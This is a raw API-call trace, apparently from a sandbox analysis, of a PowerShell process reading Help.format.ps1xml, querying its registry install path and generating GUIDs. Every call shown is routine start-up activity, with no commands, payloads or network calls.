	[0283.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.133] VirtualQuery (in: lpAddress=0xcbec0, lpBuffer=0xccd80, dwLength=0x30 | out: lpBuffer=0xccd80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.134] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x2d02bfcb, Data2=0x8e2c, Data3=0x4ae5, Data4=([0]=0x90, [1]=0x19, [2]=0x47, [3]=0xe9, [4]=0xee, [5]=0xd1, [6]=0xb3, [7]=0xa))) returned 0x0
	[0283.134] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.134] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x62d0d5fe, Data2=0x1559, Data3=0x432a, Data4=([0]=0xb3, [1]=0xe4, [2]=0xd6, [3]=0xd5, [4]=0x70, [5]=0x32, [6]=0x54, [7]=0xb2))) returned 0x0
	[0283.134] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xbf5cc3c0, Data2=0x8060, Data3=0x4933, Data4=([0]=0x98, [1]=0xbe, [2]=0xd3, [3]=0x79, [4]=0xbe, [5]=0x1d, [6]=0x42, [7]=0x86))) returned 0x0
	[0283.134] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x15ae747e, Data2=0xc3be, Data3=0x49b3, Data4=([0]=0xa2, [1]=0xc2, [2]=0x3d, [3]=0xcc, [4]=0x90, [5]=0xe9, [6]=0xc5, [7]=0xb1))) returned 0x0
	[0283.135] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.135] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.135] SetErrorMode (uMode=0x1) returned 0x1
	[0283.135] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0283.135] GetFileType (hFile=0x304) returned 0x1
	[0283.135] SetErrorMode (uMode=0x1) returned 0x1
	[0283.135] GetFileType (hFile=0x304) returned 0x1
	[0283.136] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.137] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.137] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.137] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.137] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.137] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.138] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.138] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.139] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.139] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.139] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.139] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.140] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.140] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.140] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.140] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.141] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.142] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.142] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.142] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.142] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.143] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.674] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.675] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.675] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.675] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.675] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.678] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.680] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.683] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.683] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.683] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.685] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.685] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.686] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.686] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.686] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.686] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.687] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.687] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.687] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.687] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.688] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.688] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.688] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.688] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.688] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.689] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.689] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.689] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.690] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.690] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.690] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.690] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.690] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.691] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.691] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.691] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.691] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.691] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.692] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.692] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0283.692] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0xf37, lpOverlapped=0x0) returned 1
	[0283.692] ReadFile (in: hFile=0x304, lpBuffer=0x2dfd107, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfd107*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0283.692] ReadFile (in: hFile=0x304, lpBuffer=0x2dfda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2dfda68*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0283.692] CloseHandle (hObject=0x304) returned 1
	[0283.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.693] SetErrorMode (uMode=0x1) returned 0x1
	[0283.693] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd340 | out: lpFileInformation=0xcd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0283.693] SetErrorMode (uMode=0x1) returned 0x1
	[0283.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.693] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd428 | out: phkResult=0xcd428*=0x304) returned 0x0
	[0283.693] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3ac, lpData=0x0, lpcbData=0xcd3a8*=0x0 | out: lpType=0xcd3ac*=0x1, lpData=0x0, lpcbData=0xcd3a8*=0x56) returned 0x0
	[0283.693] CoTaskMemAlloc (cb=0x5a) returned 0x1b835740
	[0283.693] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd37c, lpData=0x1b835740, lpcbData=0xcd378*=0x56 | out: lpType=0xcd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd378*=0x56) returned 0x0
	[0283.693] CoTaskMemFree (pv=0x1b835740) 
	[0283.694] RegCloseKey (hKey=0x304) returned 0x0
	[0283.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.698] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x9985337, Data2=0xefff, Data3=0x4436, Data4=([0]=0xab, [1]=0x34, [2]=0xe0, [3]=0x38, [4]=0xe0, [5]=0x7c, [6]=0x5b, [7]=0x8e))) returned 0x0
	[0283.699] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x58e97861, Data2=0xf94b, Data3=0x4122, Data4=([0]=0xa5, [1]=0xfa, [2]=0x5f, [3]=0xde, [4]=0x1, [5]=0xb8, [6]=0x56, [7]=0x1))) returned 0x0
	[0283.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
